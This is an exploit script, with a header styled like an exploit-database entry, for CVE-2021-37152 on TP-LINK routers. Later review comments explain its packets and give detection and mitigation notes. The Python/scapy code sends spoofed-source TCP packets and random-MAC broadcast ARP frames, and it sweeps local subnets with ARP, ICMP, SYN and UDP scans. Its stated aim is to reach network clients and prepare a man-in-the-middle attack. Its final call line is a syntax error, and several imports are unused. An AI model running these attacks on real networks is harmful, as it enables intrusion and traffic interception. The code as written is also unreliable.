# Exploit Title: Access network clients by sending packets in wireless TP-LINK and preparing for a mitm attack
# Date: 05.05.2021
# Exploit Author: Michael Alamoot (lhashashinl)
# Vendor Homepage: https://github.com/lhashashinl/CVE-2021-37152/
# Software Link: https://github.com/lhashashinl/CVE-2021-37152/CVE-2021-37152.py
# Version: 1.1.1
# Tested on: 5.10.0-kali7-amd64
# CVE: CVE-2021-37152
# Documentation: https://github.com/lhashashinl/CVE-2021-37152/README.md
# =========================================
#!/usr/bin/env python3
# DEVELOPER Hashashin
# import library py
# banner
# This exploit is designed for accessing and scanning network clients,
# so that you can easily gain access and prepare for a mitm attack;
# the exploit attacks at layers three and two, as explained below.
# It has been performed on most devices in the tested range; the tested
# models and attack options are as follows:
# TP-LINK 54Mbps Wireless ADSL2+ Modem Router TD-W8901G power 9V == 0.85A ,
# TD-W9960-v1.20 , TP-LINK TL-WR840N300Mbps New Design Wireless N Router
# Exploit works on most devices tested on these models
# ========================================================
# imports -- of everything below, only scapy (packet classes, Rand* values, send/sendp/sr/srp)
# and subprocess are referenced by the code that follows; the rest are unused third-party installs
from itertools import count
import socket
from scapy.all import *
from scapy import *
import sys , os , qrcode , weakref , quopri , networkx
import socketserver ,sockshandler , socket , _socket
from scapy import asn1fields , _version_from_git_describe
from colorama import Fore , init , Back , colorama_text
from sys import argv , set_asyncgen_hooks , hash_info
import aiohttp , aioconsole , requests
import random , re , readline , subprocess
import fabric , ftplib , icalendar , hashid
# lhashashinl <--~M--->
# ==================================================
# hex
# Two module-level constants that nothing below references (the `exploit`
# class builds its packets from scapy objects instead).
#
# NOTE(review): this is an ordinary str literal, not a raw or bytes literal,
# so the `\xNN` escapes are decoded at parse time, and the backslash at the
# end of each of the next three lines is a line continuation: `\x00\` +
# newline + `x00` becomes a NUL byte followed by the three ASCII characters
# "x00".  The resulting value therefore does not reproduce the dump in
# hexdumpPyload below.
rawpyload = """
\x00\x00V\x04W\x00\x00c\x06^3\xcc\xc1f\xa8\xc0\xa8\x01\x06$
\x04\x00\x16\x00\x0009\x00\x00\x00dP\x02\x03\xe8a\xfd\x00\
x00\x08\x00\xa0\xea\x00\x00\x00\x00\x00\x01\x08\x00\x06\x04\
x00\x01\xfc\xf8\xae\x0f\xb1\xd0\xc0\xa8\x01\x01\xff\xff\xff\
xff\xff\xff\xc0\xa8\x01\x06\x005\x005\x00\n\x00\x00hi"""
# Hex dump (offset, 16 bytes, ASCII column) of a packet whose first byte 0x45
# reads as an IPv4 version/IHL byte; bytes 0x10-0x13 (the IPv4 destination
# position) are C0 A8 01 06 = 192.168.1.6.  Kept for reference only; unused.
hexdumpPyload = """
0000 45 00 00 5B 04 57 00 00 63 06 FD A9 FA 4D 99 A0 E..[.W..c....M..
0010 C0 A8 01 06 31 94 00 16 00 00 30 39 00 00 00 64 ....1.....09...d
0020 50 02 03 E8 F3 E3 00 00 08 00 8B 17 00 00 00 00 P...............
0030 00 01 08 00 06 04 00 01 FC F8 AE 0F B1 D0 C0 A8 ................
0040 01 01 FF FF FF FF FF FF C0 A8 01 06 00 35 00 35 .............5.5
0050 00 0F 00 00 4D 69 63 68 61 65 6C ....Michael
"""
# ==================================================
# Attack
class exploit:
    """Scapy-based packet sender and subnet scanner used by this PoC.

    ``__init__`` stores the target address and a set of scapy volatile random
    values (``RandIP``, ``RandMAC``, ``RandShort``, ...) that are used as
    spoofed source fields when packets are built.  ``pyload`` transmits a
    layer-3 packet with a random source IP and a broadcast ARP frame with a
    random source MAC; the four ``scan*`` methods sweep hard-coded
    ``192.168.x.x`` ranges with ARP, ICMP echo, TCP SYN and UDP probes and
    print the responders.  ``self.target`` is only used by ``pyload``; the
    scans ignore it.

    Detection / mitigation notes (review):
        Every layer-3 packet carries the same fixed header values (IP
        ``id=1111``, ``ttl=99``, TCP ``seq=12345``/``ack=100``/``window=1000``,
        SYN to ports 22 and 80) on top of a randomised source address, and the
        layer-2 frame is a broadcast ARP with a random source MAC and
        ``pdst=255.255.255.255``.  Both are straightforward to signature in a
        capture or IDS rule, and spoofed L2/L3 source addresses of this kind
        are what DHCP snooping / dynamic ARP inspection and ingress address
        filtering are designed to drop.  The scans are full-subnet ARP, ICMP
        and SYN sweeps, i.e. classic scan-detector triggers.  Raw packet
        injection through scapy normally requires root / CAP_NET_RAW.
    """
    def __init__(self , target: str ,com=None , hand=False , end=True ,*args, **kwargs) -> None:
        """Remember *target* and create the random-field generators.

        Args:
            target: destination handed to ``IP(dst=...)`` and ``ARP(pdst=...)``
                by ``pyload``.  It is not validated.
            com, hand, end, *args, **kwargs: accepted but never read.
        """
        self.target = target
        # scapy volatile values; presumably each is re-drawn whenever a packet
        # that uses it is built (scapy's documented Rand* behaviour -- confirm).
        self.ipr = RandIP()  # spoofed IPv4 source for the layer-3 packet
        self.ip6R = RandIP6()  # not referenced by any method below
        self.macr = RandMAC()  # spoofed Ethernet source for the layer-2 frame
        self.byteR = RandByte()  # not referenced by any method below
        self.shortr = RandShort()  # random TCP source port
        self.binR = RandBin()  # not referenced by any method below
    def pyload(self , message , DefaultGetway: str , interface: str , count, countLeyer2 , *args, **kwargs):
        """Build and transmit one layer-3 packet and one layer-2 ARP broadcast.

        Args:
            message: appended, via ``f"{message}"``, as the trailing string
                payload of the layer-3 packet.
            DefaultGetway: address written into the ``psrc`` field of the ARP
                header that is stacked inside the layer-3 packet.
            interface: passed to scapy as ``iface`` for both sends.
            count: number of copies of the layer-3 packet; also converted with
                ``int()`` to size the status-print loops.
            countLeyer2: number of copies of the layer-2 frame; also ``int()``-ed.
            *args, **kwargs: accepted but never read.

        Returns:
            The layer-3 scapy packet, whether or not sending succeeded.

        Notes (review):
            - IP/TCP/ICMP/ARP/UDP/str is not a meaningful protocol nesting;
              scapy does not reject it, but to a receiver everything after the
              TCP header is just opaque segment data.
            - ``dport=[22,80]`` is a scapy field list, so ``send`` presumably
              emits one packet per port, each ``count`` times -- confirm.
            - Both sends sit under a bare ``except:``, which also catches
              ``KeyboardInterrupt``/``SystemExit`` and discards the real error
              (no privilege, unknown interface, non-numeric count); only the
              "FAILED" lines are printed.  A non-numeric ``count`` then raises
              again from ``int(count)`` inside the except body itself.
            - The success lines are printed in a loop after a single ``send``
              call, so they are not per-packet confirmations.
            - The ``count`` parameter shadows ``itertools.count`` imported at
              module level.
        """
        # Layer 3: random source IP, fixed id/ttl, SYN to 22 and 80, then ICMP,
        # ARP and UDP headers stacked as payload, followed by the message text.
        pyload = IP(src=self.ipr,dst=self.target,id=1111,ttl=99,ihl=None,len=None)/TCP(sport=self.shortr,dport=[22,80],seq=12345,ack=100,window=1000,flags="S",dataofs= None)/ICMP(type = "echo-request" , code=0)/ARP(psrc=DefaultGetway,hwdst="ff:ff:ff:ff:ff:ff",pdst=self.target , hwlen= None, plen= None)/UDP(len= None,chksum= None)/f"{message}"
        # Layer 2: broadcast ARP from a random source MAC, pdst 255.255.255.255.
        pyloadLeyer2 = Ether(src=self.macr , dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="255.255.255.255",hwdst="ff:ff:ff:ff:ff:ff",hwlen= None, plen= None)
        # Local address list for the status lines, obtained by running
        # `hostname -I` through a shell.  The command is a constant string, so
        # there is no injection risk here, but it is Linux-specific.
        ipm = subprocess.getoutput("hostname -I")
        try:
            send(pyload , count=count , verbose=None , realtime=None , socket=None , iface=interface)  # layer-3 send, `count` copies
            for i in range(int(count)):
                print(f"\033[100;37;1m PYLOAD \033[0m send packet {ipm}to: {self.target} inteface={interface} count={count} ttl=99 ")
        except:  # NOTE(review): bare except -- hides the real failure reason
            for i in range(int(count)):
                print(f"\033[40;31;1m FAILED \033[0m send packet {ipm}to: {self.target} inteface={interface} count={count} ttl=99 ")
        try:
            sendp(pyloadLeyer2 , inter=.001 , iface=interface , count=countLeyer2 , socket=None)  # layer-2 send, 1 ms apart
            for n in range(int(countLeyer2)):
                print(f"\033[41;37;1m PYLOAD \033[0m send packet {ipm}to: {self.target} inteface={interface} count={countLeyer2} ttl=99 ")
        except:  # NOTE(review): bare except -- hides the real failure reason
            for n in range(int(countLeyer2)):
                print(f"\033[40;31;1m FAILED \033[0m send packet {ipm}to: {self.target} inteface={interface} count={countLeyer2} ttl=99 ")
        return pyload
    def scanARP(self):
        """ARP-sweep the hard-coded 192.168.1.0/24 and print MAC/IP of responders.

        Uses ``srp`` (layer 2) with a 2 s timeout.  ``self.target`` is ignored.
        Returns scapy's answered list; the unanswered list is discarded.
        """
        ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="192.168.1.0/24"),timeout=2)  # broadcast who-has for every host in the /24
        ans.summary(lambda s,r: r.sprintf("%Ether.src% %ARP.psrc%") )  # print "<mac> <ip>" per reply
        return ans
    def scanICMP(self):
        """ICMP-echo-sweep the hard-coded 192.168.1.1-254 and print responders.

        No ``timeout`` is passed to ``sr``, so the call may block for a long
        time while probes go unanswered -- TODO confirm scapy's behaviour for
        ``timeout=None``.  ``self.target`` is ignored; unanswered list discarded.
        """
        ans, unans = sr(IP(dst="192.168.1.1-254")/ICMP())  # one echo request per address
        ans.summary(lambda s,r: r.sprintf("%IP.src% is alive") )  # print each replying host
        return ans
    def scanTCP(self):
        """SYN-probe port 80 across the hard-coded 192.168.1.* and print responders.

        Same caveats as ``scanICMP``: no timeout, ``self.target`` ignored,
        unanswered list discarded.  Any reply (SYN/ACK or RST) counts as alive.
        """
        ans, unans = sr( IP(dst="192.168.1.*")/TCP(dport=80,flags="S") )  # SYN to port 80 per address
        ans.summary( lambda s,r : r.sprintf("%IP.src% is alive") )  # print each replying host
        return ans
    def scanUDP(self):
        """UDP-probe port 0 on 192.168.*.1-10 and print responders.

        Same caveats as ``scanICMP``: no timeout, ``self.target`` ignored,
        unanswered list discarded.  The ``sr`` answered list will typically be
        ICMP port-unreachable replies rather than UDP answers -- confirm.
        """
        ans, unans = sr( IP(dst="192.168.*.1-10")/UDP(dport=0) )  # UDP to port 0 on the first ten hosts of every 192.168.x subnet
        ans.summary( lambda s,r : r.sprintf("%IP.src% is alive") )  # print each replying host
        return ans
# Runs at import time: there is no `if __name__ == "__main__":` guard, and the
# arguments are placeholders (empty target/interface strings).
e = exploit(target="")
# NOTE(review): `count=` and `countLeyer2=` carry no value, so this line is a
# SyntaxError -- the module cannot be parsed, let alone executed, as written.
e.pyload(message="" , DefaultGetway="" , interface="" , count= , countLeyer2=)